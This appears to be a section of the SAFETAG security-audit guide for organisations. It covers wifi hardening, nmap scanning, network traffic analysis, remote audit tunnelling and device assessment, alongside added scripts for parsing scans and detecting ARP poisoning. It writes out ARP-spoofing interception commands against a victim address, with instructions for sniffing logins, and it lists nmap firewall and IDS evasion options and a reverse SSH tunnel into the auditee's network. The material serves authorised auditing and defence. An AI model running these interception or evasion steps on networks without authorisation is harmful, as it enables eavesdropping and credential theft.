MAC filtering and WEP provide no effective protection for a wifi network. Most wifi routers offer WPA encryption as an option, and if it is available it should be enabled immediately. Some older routers (and wifi devices) do not support WPA; it is highly recommended to upgrade immediately to hardware that supports WPA and to eliminate all WEP network access. Very few devices still in service lack WPA2 support. As WPA3 becomes an option, upgrade to that.

Recommendations for WPA networks

WPS Pin entry should be disabled on the wireless router, or only enabled temporarily to add new devices to the network.

Choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

The WPA password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains four or five—or more—relatively uncommon words.) The password should not contain common words, including number sequences, especially if they are related to the organization, its employees or its work.

A guest network, with no local network access and a distinct (possibly easier to communicate) password should be available if guests are ever given wifi access. Because passwords for guest networks inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the guest password should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

Network Scanning

Summary

Network scanning is a technique used to gather information about the devices connected to a network. It involves enumerating open ports and running services to determine the type of device, the operating system it is running, the applications it is running and a lot more. There are many open source tools that you can use to perform this technique. Though it may look like a simple and ordinary technique, it may be used with both good and bad intentions.

The goal for this exercise is to identify, enumerate and categorize all devices connected to the network. Any device that has an IP address is our target. This may include:

Overview
Materials Needed
Considerations
Walkthrough

Local networks often have a variety of devices connected to them - servers, laptops, printers, and user devices such as cellphones and tablets. Scanning the connected devices can reveal potential areas for further research, such as odd ports being open, out of date devices/services, forgotten servers/services etc. This information is then reviewed in the Vulnerability Research exercise, and then (if required) validated in the Penetration Testing exercise.

Using a network scanning tool (nmap/zenmap work well), discover the devices connected to the organization's network, and explore further information such as services, service banners, and operating systems. More intense scans can be too time-consuming to run across the entire network, so target those to higher value systems. As always, be aware of the scans and additional scripts you choose, and focus your exploration (in nmap) on scripts categorized as "safe".

Overall Process
  1. Using zenmap/nmap, identify all of the devices currently active on the network. It is worth repeating a quick scan at different times of the day and on different days to get a more complete view of the network.
    • Discover network-connected devices, including servers and workstations, but also smartphones, printers, security cameras, VoIP phones, and other devices.
    • Record the version and patch levels of software on the device.
  2. For the active, in-scope devices, the next step is to gather additional details including hostnames, MAC addresses (useful for tracking devices over multiple days, as their IP address may change), operating system and versions, port numbers, and any running services such as shared drives, remote management services and old or legacy services. Host enumeration sometimes takes time, as not all devices respond to your scans in the same way. To overcome this, vary the scan types and tools you use (see the nmap options below).
    • Run OS detection options.
    • Scan for open ports and service banners (not all ports correctly map to their "expected" services; banner scanning also provides service version information).
    • Select additional nmap scripts and more exhaustive port scanning as needed. Filter for safe scripts!
  3. Categorize the devices that you discover. This makes it more efficient later, when running vulnerability scans, to target them effectively. For devices which are not easily categorized, see the IoT section below.

  4. Port/service research, and how to decide if an open port is suspicious. If a port is open on a personal computer or mobile device, this should be immediately considered suspicious and investigated.
    • Inspect all systems providing internal services to the host organization.
    • Identify weak ports or services available under the current device's firewall configuration.
    • Identify and investigate any open ports that should not be open (e.g.: almost no ports should be open on personal computers; see below).
    • Identify all odd/obscure/one-off services.
  5. Using the list of software versions and patches, identify attacks and, if possible, known malware that devices in the office are vulnerable to.

Custom instructions per type of device

Servers

An open port in a server or IoT device should be investigated if it doesn't correspond to a known service. For example, if the open port is 80, 8080, or 443, it's supposed to be open for a web server, so you can try to browse it by pasting the IP address in your browser address bar.

If it's for SSH (port 22), try to log into it through SSH. If the service isn't supposed to be running on the identified device, you can run a scan of the open ports and request service banners, and/or try to telnet directly to the IP:port to identify what service is listening. To identify what a port might be used for, look at the complete list at IANA.org. Using nmap's banner scripts will also reveal what the service reports itself as (for example, you can run ssh, usually port 22, on port 443, usually https). Once you have identified what service that port might be used for, always check that that service is actually running on the machine and that the user or sysadmin is aware of it.

In general, these are ports that might be open in a server:

Port | Service
21 | FTP
22 | SSH
23 | Telnet
25 | SMTP
53 | DNS
80 | HTTP
110 | POP
139 | SMB
143 | IMAP
194 | IRC
443 | HTTPS
465 | SMTP
530 | CUPS
587 | SMTP
667 | IRC
993 | IMAP
995 | POP
1900 | SSDP (UPnP)
3306 | MySQL
6881 to 6889 | Torrent
6969 | Torrent
8080 | HTTP
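As an added illustration of steps 2 through 4 of the process above and of the server port list just given (this is example code, not part of SAFETAG or of nmap), the following script reads the XML that nmap writes with -oX, extracts the per-host details the walkthrough asks for (hostname, MAC address and vendor, OS match, open ports with service versions), and flags hosts according to the rules stated above: unexpected ports on servers, any open port on personal devices, and uncategorized hosts for IoT follow-up. The XML document and the INVENTORY mapping are constructed samples; in practice the inventory is the categorization you produced in step 3.

```python
"""Review an nmap XML report (-oX) against the auditor's device categories.

Added example, not SAFETAG's own code. The XML below is a constructed sample
in the shape of nmap's -oX output (trimmed to the elements used here); the
INVENTORY is a constructed assumption standing in for the auditor's step 3.
"""
import xml.etree.ElementTree as ET

# Ports the text above lists as ones that might legitimately be open on a server
EXPECTED_SERVER_PORTS = {21, 22, 23, 25, 53, 80, 110, 139, 143, 194, 443, 465,
                         530, 587, 667, 993, 995, 1900, 3306, 6969, 8080}
EXPECTED_SERVER_PORTS |= set(range(6881, 6890))

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 172.16.1.0/24">
<host><status state="up"/>
  <address addr="172.16.1.10" addrtype="ipv4"/>
  <address addr="00:50:56:AA:BB:01" addrtype="mac" vendor="VMware"/>
  <hostnames><hostname name="files.sampleorg.example" type="PTR"/></hostnames>
  <ports>
    <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="7.4"/></port>
    <port protocol="tcp" portid="8443"><state state="open"/><service name="https-alt"/></port>
  </ports>
  <os><osmatch name="Linux 4.X" accuracy="96"/></os>
</host>
<host><status state="up"/>
  <address addr="172.16.1.21" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port></ports>
  <os><osmatch name="Microsoft Windows 10" accuracy="97"/></os>
</host>
<host><status state="up"/>
  <address addr="172.16.1.22" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="22"><state state="closed"/></port></ports>
</host>
<host><status state="up"/>
  <address addr="172.16.1.30" addrtype="ipv4"/>
  <address addr="00:AA:BB:CC:DD:30" addrtype="mac" vendor="ExampleCam Ltd"/>
  <ports><port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port></ports>
  <os><osmatch name="Linux 2.6.X" accuracy="85"/></os>
</host>
<host><status state="down"/><address addr="172.16.1.40" addrtype="ipv4"/></host>
</nmaprun>
"""

# Constructed: categories the auditor assigned in step 3 (unlisted hosts are "unknown")
INVENTORY = {"172.16.1.10": "server", "172.16.1.21": "workstation",
             "172.16.1.22": "workstation"}


def parse_nmap_xml(xml_text):
    """Return one dict per host that is up: ip, mac, vendor, hostname, os, open ports."""
    hosts = []
    for h in ET.fromstring(xml_text).iter("host"):
        if h.find("status").get("state") != "up":
            continue
        info = {"ip": None, "mac": None, "vendor": None, "hostname": None,
                "os": None, "ports": []}
        for a in h.findall("address"):
            if a.get("addrtype") == "ipv4":
                info["ip"] = a.get("addr")
            elif a.get("addrtype") == "mac":
                info["mac"], info["vendor"] = a.get("addr"), a.get("vendor")
        hn, om = h.find("hostnames/hostname"), h.find("os/osmatch")
        info["hostname"] = hn.get("name") if hn is not None else None
        info["os"] = om.get("name") if om is not None else None
        for p in h.findall("ports/port"):
            if p.find("state").get("state") != "open":
                continue  # closed/filtered ports are not findings
            svc = p.find("service")
            parts = (svc.get("product"), svc.get("version")) if svc is not None else ()
            info["ports"].append({"port": int(p.get("portid")), "proto": p.get("protocol"),
                                  "service": svc.get("name") if svc is not None else None,
                                  "version": " ".join(v for v in parts if v)})
        hosts.append(info)
    return hosts


def review_hosts(hosts, inventory):
    """Apply the open-port rules from the text; returns (ip, finding) pairs."""
    findings = []
    for h in hosts:
        category = inventory.get(h["ip"], "unknown")
        open_ports = [p["port"] for p in h["ports"]]
        if category == "server":
            odd = [p for p in open_ports if p not in EXPECTED_SERVER_PORTS]
            if odd:
                findings.append((h["ip"], f"server with unexpected open ports {odd}"))
        elif category in ("workstation", "mobile"):
            if open_ports:  # almost no ports should be open on personal devices
                findings.append((h["ip"], f"{category} with open ports {open_ports}"))
        else:
            findings.append((h["ip"], f"uncategorized device (OS: {h['os'] or 'no match'}, "
                                      f"vendor: {h['vendor'] or 'unknown'}): possible IoT, identify it"))
    return findings


if __name__ == "__main__":
    for ip, finding in review_hosts(parse_nmap_xml(SAMPLE_NMAP_XML), INVENTORY):
        print(f"{ip:15s} {finding}")
```

Run it against a real report by reading the file produced with `nmap ... -oX scan.xml` instead of SAMPLE_NMAP_XML; repeating the scan on different days and diffing the findings lists gives the "more complete view" step 1 asks for.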

IoT Devices

IoT (Internet of Things) devices are increasingly popular because of their ease of use and ability to address specific needs (e.g. an IP camera instead of CCTV). As classes of network appliances become common, additional exercises (such as the VoIP assessment) can be created. For others, it is still worth conducting a basic assessment to determine what security implications network-connected devices may have.

In the course of network scanning, watch for devices without clear operating system identification (from nmap/zenmap), and/or devices registering as Linux or unknown (particularly if there are no Linux users or servers), and use hostnames and MAC address vendor lookups (Wireshark's OUI lookup, MACVendors) for "hints".

Follow up on these devices with more intensive, specific scans to positively identify them, and/or follow up with staff to help physically locate the devices. Some devices, such as Smart TVs, may not even be normally thought of as devices worth considering, but if they are connected to the work network, they can add vulnerabilities.

Once any IoT devices have been identified, follow up with research as to their current and possible patch level/software update, what vulnerabilities they may have even if fully updated, and if there have been any known attacks against the platform. Check their configuration to see if they are accessible from the Internet (directly, via UPnP, or via an external service that the device connects out to). Check to see that default passwords have been updated, and any service-connected devices have strong, unique and not-previously-breached passwords.

If there are vulnerabilities that cannot be mitigated, consider suggesting removing the IoT device from the network, or creating a separate network, disconnected from organizational resources, for non-work devices.

Windows / SMB Networks

You can use smbtree to request a list of all SMB network device names and nmblookup to map them to their IP addresses.

SMB file servers that accept unsigned NTLM authentication messages are vulnerable to man-in-the-middle attacks. This also allows an attacker on the LAN to add, remove or copy files to and from the organization’s file servers (and workstations with file sharing enabled).

MacOS

GNULinux

External Network Scanning

Selected scanning of external network devices (websites, webmail, extranet services) may also reveal vulnerabilities or other areas of concern. However, it is important that you seek approval or any written document that proves you have the authority to scan your target organization along with its web resources and services.

External network scans differ from local network scans, because you are scanning devices that are publicly available, and the scan can be done remotely from outside the organization's premises. If your auditee has agreed to have their public-facing machines scanned, keep in mind that you may need to ask your auditee to whitelist your scanning address so that IDS/IPS, firewalls and other blocking mechanisms do not interfere with your scan. Also make sure that you have verified the target is in scope, to avoid scanning out-of-scope targets that may lead you into other problems.

Most of the machines you'll encounter over external network scans were:

Using nmap/zenmap

Using a network scanning tool (nmap/zenmap work well), discover the devices connected to the organization's network, and explore further information such as services, service banners, and operating systems. More intense scans can be too time-consuming to run across the entire network, so target those to higher value systems. As always, be aware of the scans and additional scripts you choose, and focus your exploration (in nmap) on scripts categorized as safe or "non-disruptive".

According to nmap's website:

"Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts". It is considered the most popular network mapping tool available.

Below are commands to perform network scanning using Nmap.

Command | Description
nmap 192.168.1.1 | Scan a single specific IP/target
nmap www.targetdomain.com | Scan a specific domain
nmap 172.16.1.1-35 | Scan the IP range from 172.16.1.1 to 172.16.1.35
nmap 172.16.1.1/24 | Scan a network subnet
nmap -iL target-IPs.txt | Scan the list of IPs in the file target-IPs.txt
nmap -p 80 172.16.1.1 | Scan specific port(s) on a target, IP range or list file
nmap -p 21-80 172.16.1.1 | Scan a target, IP range or list file with a specific port range
nmap -F 172.16.1.1 | Scan the 100 most common ports on a target (fast scan)
nmap -p- 172.16.1.1 | Scan all 65,535 ports on a target

Option | Command | Description
-sT | nmap -sT 172.16.1.1 | TCP connect port scan (the scan type nmap uses by default when run without root privileges)
-sS | nmap -sS 172.16.1.1 | TCP SYN port scan
-sU | nmap -sU 172.16.1.1 | Scan UDP ports
-sA | nmap -sA 172.16.1.1 | TCP ACK port scan
-sn | nmap -sn 172.16.1.1/24 | Host discovery on an IP subnet range, port scanning disabled
-Pn | nmap -Pn 172.16.1.1/24 | Port scan an IP subnet range, host discovery disabled
-n | nmap -n 172.16.1.1 | Scan target without DNS resolution
-PR | nmap -PR 172.16.1.1 | Perform ARP discovery on the local network

Option | Command | Description
-sV | nmap -sV 172.16.1.1 | Perform version detection of services running on open ports
-O | nmap -O 172.16.1.1 | Remote OS detection using TCP/IP stack fingerprinting
-A | nmap -A 172.16.1.1 | Enable OS detection, version detection, script scanning and traceroute

Option | Command | Description
-T0 | nmap -T0 172.16.1.1 | PARANOID scan: slowest timing, intended to evade IDS
-T1 | nmap -T1 172.16.1.1 | SNEAKY scan: evade IDS
-T2 | nmap -T2 172.16.1.1 | POLITE scan: slow scan that uses less bandwidth and fewer target machine resources
-T3 | nmap -T3 172.16.1.1 | NORMAL scan: default speed
-T4 | nmap -T4 172.16.1.1 | AGGRESSIVE scan: faster scan, assuming you are on a fast and reliable network
-T5 | nmap -T5 172.16.1.1 | INSANE scan: for extraordinarily fast networks, trades accuracy for speed

Option | Command | Description
-sV -sC | nmap -sV -sC 172.16.1.1 | Scan using the default script set
-sV --script=scriptname* | nmap -sV --script=smb* 172.16.1.1 | Scan target with a set of scripts (in this example, the smb scripts)
--script=script-name.nse | nmap -sV -p 443 --script=ssl-heartbleed.nse 172.16.1.1 | Scan using a specific script (in this example, the ssl-heartbleed.nse script)
--script=script1,script2,script3 | nmap --script=asn-query,whois,ip-geolocation-maxmind 172.16.1.1 | Scan using multiple different scripts combined

Option | Command | Description
-f | nmap -f 172.16.1.1 | Scan using small fragmented IP packets to evade packet filtering
--mtu value | nmap --mtu 64 172.16.1.1 | Scan using a custom MTU size
-D decoy addresses | nmap -D 172.16.1.200,172.16.1.100 172.16.1.1 | Scan using the listed decoy (spoofed) source addresses
-S fakesource.com | nmap -S fakesource.com targetdomain.com | Scan from the spoofed source fakesource.com (may require an egress interface, e.g. -e eth0, and the -Pn option)
-g port number | nmap -g 53 172.16.1.1 | Scan using port 53 as the source port (making it look like regular DNS traffic)
--proxies http://1.2.3.4:8080,http://4.3.2.1:8080 | nmap --proxies http://123.12.23.10:8080,http://211.212.101.22:8080 172.16.1.1 | Relay nmap scans through HTTP/SOCKS4 proxies

Option | Command | Description
-oN name.file | nmap 172.16.1.1 -oN result.file | Normal output to the file result.file
-oX file.xml | nmap 172.16.1.1 -oX result.xml | XML output to the file result.xml
-oG name.file | nmap 172.16.1.1 -oG result.grep | Grep-able output to the file result.grep
-oA results | nmap 172.16.1.1 -oA results | Output in all three major formats at once

Working with GUI using Zenmap

While Nmap may seem intimidating to some, especially with all those commands and options, you can use a GUI front end for Nmap called Zenmap. You can download Zenmap from this link

Zenmap has features that help you manage scans and import and export results.

It comes with pre-set scan profiles that you can choose from. Depending on your target environment and your agreement with the client, you can select from:

Profile | Command
Intense Scan | nmap -T4 -A -v
Intense Scan + UDP | nmap -sS -sU -T4 -A -v
Intense Scan + all TCP ports | nmap -p 1-65535 -T4 -A -v
Intense Scan - No ping | nmap -T4 -A -v -Pn
Ping Scan | nmap -sn
Quick Scan | nmap -T4 -F
Quick Scan Plus | nmap -sV -T4 -O -F --version-light
Quick Traceroute | nmap -sn --traceroute
Regular Scan | nmap
Slow Comprehensive Scan | nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)"

Recommendation

While office networks are often treated as "trusted" spaces, measures should be in place to reduce the potential harm of an attacker who gains access. In addition, devices that "travel" -- such as laptops and mobile phones -- should have adequate security settings (generally, firewalls) to protect them on other networks.

A policy should be in place for connecting personal devices to work networks, as well as work devices to non-work networks.

Network Traffic Analysis

Summary

Any content that is sent out over the network without encryption is easy to intercept; this includes email, web passwords, and chat messages.

Such an attacker could be someone, such as a patron of the Internet cafe where a staff member is working, who just happens to be using the same local network to connect to the Internet. Or, she could work for an organization with privileged access to the relevant network, such as the Internet Service Provider (ISP) of either the sender or receiver, or one of the network-backbone connections made along the way.

Overview
Materials Needed
Considerations
Walkthrough
Network Traffic Interception

Step 1: The attacker tricks the victim into routing all of their traffic through the attacker’s machine. This involves making a simple request to the victim’s IP address, which is not difficult to do. Computers are rarely configured to ignore such requests.

$ sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

$ sudo arpspoof -i wlan0 -t 192.168.1.99 192.168.1.1

Sample Output:

00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
...
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55

In the example above, only a single victim (192.168.1.99) is being targeted, but the attack works fine against multiple victims, or even against the entire network. In other words, the attacker does not need to know which IP address (on the office or Internet cafe LAN, for example) belongs to the target. Furthermore, the victim is extremely unlikely to notice any sign that this phase of the attack is taking place.
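The same frames that carry out this attack are also what a defender can look for: a second MAC address suddenly claiming an IP address that belongs to the gateway, or a steady stream of unsolicited ARP replies. The script below is an added example (it is not SAFETAG's own material) that reads ARP replies written in the same one-line format as the output above and reports those signs. The BASELINE of known gateway addresses and the SAMPLE_CAPTURE lines are constructed for the demonstration; in practice the baseline comes from the router's own configuration or DHCP records, and the lines from a capture taken on the LAN.

```python
"""Detect ARP cache poisoning from a log of ARP replies.

Added example, not SAFETAG's own code. Input lines use the format of the
arpspoof output shown above: "src_mac dst_mac 0806 len: arp reply IP is-at MAC".
BASELINE and SAMPLE_CAPTURE are constructed for the demonstration.
"""
import re
from collections import Counter

ARP_REPLY = re.compile(
    r"^(?P<src>[0-9a-f:]{17}) (?P<dst>[0-9a-f:]{17}) 0806 \d+: "
    r"arp reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-f:]{17})$",
    re.IGNORECASE,
)

# Constructed baseline: addresses the administrator knows to be correct
BASELINE = {"192.168.1.1": "aa:bb:cc:dd:ee:ff"}

# Constructed capture: two genuine replies, then a burst of forged replies in
# which 00:11:22:33:44:55 claims the gateway's IP address
SAMPLE_CAPTURE = """\
aa:bb:cc:dd:ee:ff 01:23:45:67:89:01 0806 42: arp reply 192.168.1.1 is-at aa:bb:cc:dd:ee:ff
01:23:45:67:89:01 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.99 is-at 01:23:45:67:89:01
00:11:22:33:44:55 01:23:45:67:89:01 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 01:23:45:67:89:01 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 01:23:45:67:89:01 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
"""


def parse_arp_replies(lines):
    """Yield dicts (src, dst, ip, mac) for each line that is an ARP reply."""
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if m:
            yield {k: v.lower() for k, v in m.groupdict().items()}


def detect_arp_spoofing(lines, baseline, burst_threshold=3):
    """Return a list of human-readable alerts for suspicious ARP replies."""
    alerts = []
    first_seen = {}        # ip -> first MAC that claimed it in this capture
    claims = Counter()     # (ip, mac) -> number of replies making that claim
    for r in parse_arp_replies(lines):
        ip, mac = r["ip"], r["mac"]
        if mac != r["src"]:
            # A reply whose payload MAC differs from the frame's source is forged
            alerts.append(f"{ip}: claims is-at {mac} but frame came from {r['src']}")
        if ip in baseline and baseline[ip] != mac:
            alerts.append(f"{ip}: expected {baseline[ip]}, got {mac} (baseline mismatch)")
        elif ip in first_seen and first_seen[ip] != mac:
            alerts.append(f"{ip}: changed from {first_seen[ip]} to {mac} (MAC flap)")
        first_seen.setdefault(ip, mac)
        claims[(ip, mac)] += 1
    for (ip, mac), n in claims.items():
        if n >= burst_threshold:
            alerts.append(f"{ip} is-at {mac}: {n} replies (repeated unsolicited replies)")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_CAPTURE.splitlines(), BASELINE):
        print("ALERT:", alert)
```

On a real network the baseline check is the reliable one: gateway and server MAC addresses change rarely, so any reply that contradicts the baseline deserves immediate attention, while the flap and burst checks catch poisoning of addresses the defender has not recorded.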

EtterCap provides a powerful frontend to managing this process with multiple potential targets. In EtterCap:

Step 2: At this point, if the attacker is looking for unencrypted traffic, all the attacker needs to do is launch a packet-sniffer, such as Wireshark, and scan through the intercepted traffic for specific vulnerable information, such as email or website logins, as well as traffic revealing shadow infrastructure usage, such as Dropbox.

Wireshark can also be used to identify malicious traffic.

If you rarely use Wireshark, the output you will see will be a long list of packets, protocols and connections that might be hard to classify. To look at suspicious activity in a clearer way, you can use the "Protocol Hierarchy" option in the Statistics menu. A good video to learn how to use this option for this purpose can be found here.

Recommendation

Only use services with "SSL" encryption ("HTTPS"), and consider adding HTTPS Everywhere to browsers. This does not itself guarantee protection from all attacks, but it is a good first step in protecting information (such as passwords or email) in transit from your computer to the service provider.

Remote Network and User Device Assessment

Summary

This component allows the auditor to work remotely to identify the devices on a host's network, the services that are being used by those devices, and any protections in place, as well as to assess the security of the individual devices on the network.

Overview

There can be several approaches for this exercise, depending on the scenario.

Scenario 0

The organization has contacted the auditor through an intermediary who is familiar with tech and can follow SAFETAG instructions, or the organization has a tech person among their employees.

This scenario is comparable to a situation where the auditor is on site. In this case, the auditor will instruct the intermediary or the tech person in the organization to follow the instructions in the exercise on Network mapping and on User device assessment.

Scenario 1

The organization has someone among their employees who is ready to follow simple instructions, including opening a terminal and pasting commands we will provide them.

In this scenario, the auditor will send simple instructions to the auditee, so as to be able to access the organization's network through a reverse SSH tunnel and assess the LAN and individual devices from there. The computer inside the organization's network that establishes the tunnel needs to be a UNIX-like system: either a Linux live distribution or a Mac.

Scenario 2

In this scenario, no one at the organization is ready to apply complex instructions. Instead of relying on an individual, the auditor will rely on tunneling into a device located in the physical space of the auditee. This can be done in two ways:

  1. Remote Desktop or remote VPN into targeted Network. Remote Desktop is tunneling into a targeted machine that lives on the same targeted LAN network where you wish to scan the network and do the device assessment; the auditor controls the machine remotely and uses it as the auditor machine.
  2. VPN to a trusted VPN server. In this case, the auditee will connect one of their machines to a trusted VPN server, and the auditor will connect to the same VPN server, allowing both LANs at the auditee's and auditor's ends to connect.
Materials Needed
Scenario 1
Scenario 2

In the case of remote desktop:

In the case of using an in-the-middle trusted VPN server:

Applications to use: TightVNC, TeamViewer, Windows Remote Desktop

Considerations
Scenario 1
Walkthrough
Scenario 0

Instruct the intermediary or the tech person in the organization to follow the instructions in the exercise on Network mapping and on User device assessment.

Scenario 1

Legend

Instruct the auditee to initiate a connection to the server (S) and set up a reverse ssh server:

Let's assume we have a server named safetag-audit.org (S), and usernames for each auditee called auditee1, auditee2, etc.

Important: make sure that the ports you use don't conflict with ports by other services or auditees, i.e. don't use a port number twice.

Once this session is open, the auditor can access the auditee's machine (C). At this point there are a few powerful options:

example:

to connect to site 0:

    ssh [email protected] -p 2200

with site 1 in the previous example, the port would be 2210 (or whatever the auditee used in her command).

An additional thing that one might want to do is making the connection from C to S passwordless and automatic (this can be accomplished with tools or scripts readily available on the internet).

WARNING: Make sure to remove/clean any persistent connections once you are done with auditing.

There should be no need for multiple reverse tunnels, as multiple forward tunnels can be set up from S to C if needed (e.g. VNC or RDP); this requires multiple forward tunnels from A to S, though.

Scenario 2

Legend:

Someone at the auditee's side will prepare machine A in coordination with the auditor, then install TeamViewer.

After that, and using a trusted communication method, TeamViewer ID and passcode will be sent to the Auditor.

The auditor will use the ID and passcode to connect to the machine and start using machine A as the auditing machine.

There are pros and cons for this:

Cons:

  1. Internet speed: You will need a high speed Internet connection to achieve such task, as the remote access will be transferring the desktop of the targeted machine to you in order to do the tasks.
  2. Connection interruption: While you are working remotely, you might face some connection interruptions during your session, and restarting the remote access will be a challenge because in most of the cases you will need someone at the other end to authorize you to tunnel into the machine.
  3. Physical limitations: You are still physically far from the machine, which means you cannot connect a USB drive to boot from it or do any other tasks that require you to be near the device.
  4. Installing Kali Linux might be hard: it might be hard for a non-technical person to prepare a Kali Linux machine.

Pros:

  1. Usability: TeamViewer is easy to install and use. Anyone with basic knowledge on how to install software can assist you with preparing the auditing machine.
  2. Network speed: Technically, your auditing machine is the machine you are connected to, which is physically located in the targeted office and connected to the LAN network. This means that you will have full speed running your audit tasks.

Note: Some remote assistance software provides VPN features that turn machine A into a VPN server and allow machine B to VPN into it. Tunneling into that VPN server will allow you to connect to the local LAN, which lets you use machine B to run the audit.

Using an in-the-middle trusted VPN server

Legend:

Auditee's Network --------- (A) ---------- C ---------- (B) ---------- Auditor's Network

The auditor prepares an OpenVPN server (C) and creates two profiles (keys and configurations) to allow machines A and B to connect to C.

Get a VPS from your favorite and trusted VPS provider and keep in mind the physical location of the server, then install OpenVPN Server by following the instructions contained in this guide on Ubuntu Server.

The default configuration of OpenVPN will not allow the clients (A-B) to see each other on the network. To allow that, you have to enable client-to-client directive and enable your both subnets (Auditee and Auditor) to see each others networks. To do so, follow these instruction.

After finishing the installation and testing it, the auditor will pass the .ovpn file to the person at the auditee's site through a trusted way, and provide instructions on how to install and connect to the server. After connecting A and B to C, the auditor will be able to start the network and device assessment at the other end.

Note: In case the VPN is censored in A or B's countries, or in both, you can follow these instructions on how to bypass the censorship by using pluggable transports.
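The server-side files the two configuration steps above refer to, as an added example that is not part of the SAFETAG guide or of any linked OpenVPN how-to: a small POSIX shell script that renders a server.conf with the client-to-client directive and a per-client file for A and B, so that each side is routed to the other's LAN through C. The tunnel subnet, the two LAN ranges, the client names and the port are assumptions chosen for illustration; the client names must match the common names in the certificates issued to A and B.

```sh
#!/bin/sh
# Added example (not the SAFETAG guide's own script): render the OpenVPN server-side
# files that let client A (auditee's office) and client B (auditor) reach each other
# and each other's LAN through the in-the-middle server C.
# All addresses and names below are assumptions chosen for illustration.

VPN_NET="10.8.0.0 255.255.255.0"          # tunnel subnet C hands out to clients
AUDITEE_LAN="192.168.1.0 255.255.255.0"   # LAN behind machine A (assumed)
AUDITOR_LAN="192.168.50.0 255.255.255.0"  # LAN behind machine B (assumed)
CLIENT_A="auditee-a"                      # must equal the CN in A's client certificate
CLIENT_B="auditor-b"                      # must equal the CN in B's client certificate

# server.conf. The directives the text refers to:
#   client-to-client    lets tunnel clients talk to each other at all (off by default)
#   route               tells the server's kernel which LANs live behind tunnel clients
#   client-config-dir   enables the per-client files rendered below
render_server_conf() {
  cat <<EOF
port 1194
proto udp
dev tun
topology subnet
server $VPN_NET
client-to-client
client-config-dir ccd
route $AUDITEE_LAN
route $AUDITOR_LAN
keepalive 10 120
persist-key
persist-tun
EOF
}

# ccd/<common name>. 'iroute' tells OpenVPN which LAN sits behind this client;
# 'push "route ..."' gives this client the route to the *other* side's LAN.
# Pushing each LAN only to the other client avoids handing a client a route to
# its own network, which a global push "route" in server.conf would do.
render_ccd_entry() {
  # $1 = LAN behind this client, $2 = LAN this client should be able to reach
  printf 'iroute %s\n' "$1"
  printf 'push "route %s"\n' "$2"
}

# Write everything under $1 (e.g. /etc/openvpn/server).
write_files() {
  dir="$1"
  mkdir -p "$dir/ccd"
  render_server_conf > "$dir/server.conf"
  render_ccd_entry "$AUDITEE_LAN" "$AUDITOR_LAN" > "$dir/ccd/$CLIENT_A"
  render_ccd_entry "$AUDITOR_LAN" "$AUDITEE_LAN" > "$dir/ccd/$CLIENT_B"
}
```

Run `write_files /etc/openvpn/server` on C and restart the OpenVPN service. For A to carry traffic for its LAN, IP forwarding must be enabled on A and the LAN hosts need a route back to the tunnel subnet via A (or A must NAT the tunnel traffic); the same holds for B's side.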

Recommendation

Router Assessment

Covered in full in Vulnerability Scanning and Analysis

Authors: SAFETAG. Info provided: unknown. Info required: unknown.

Organizational Device Usage

Summary

This component allows the auditor to discover and assess the security of the devices on the network and/or used in the organization. This component consists of interviews, surveys, network mapping, and inspection of devices.

Purpose

Compromised devices have the ability to undermine nearly any other organizational attempt at securing information. Knowing whether devices receive basic software and security updates/upgrades, and what core protections exist against unauthorized access, is vital to designing a strategy to make the host more secure. Because the SAFETAG framework is focused on the security of data, it is also crucial that the physical devices on which this data resides, including the hard-wired networks through which it is exchanged, are not overlooked.

The Flow Of Information

User Device Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Password Security

Privilege Separation Across OS

Examining Firewalls Across OS

Identifying Software Versions

Device Encryption By OS

Anti-Virus Updates

Identifying Odd/One-Off Services

Activities

Device and Behaviour Assessment

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies software running on computers and its current version. The auditor checks for known vulnerabilities to any out of date software.

This is used to develop a report component showing how out-of-date software can lead to serious vulnerabilities.

Overview
Materials Needed
Considerations
Walkthrough

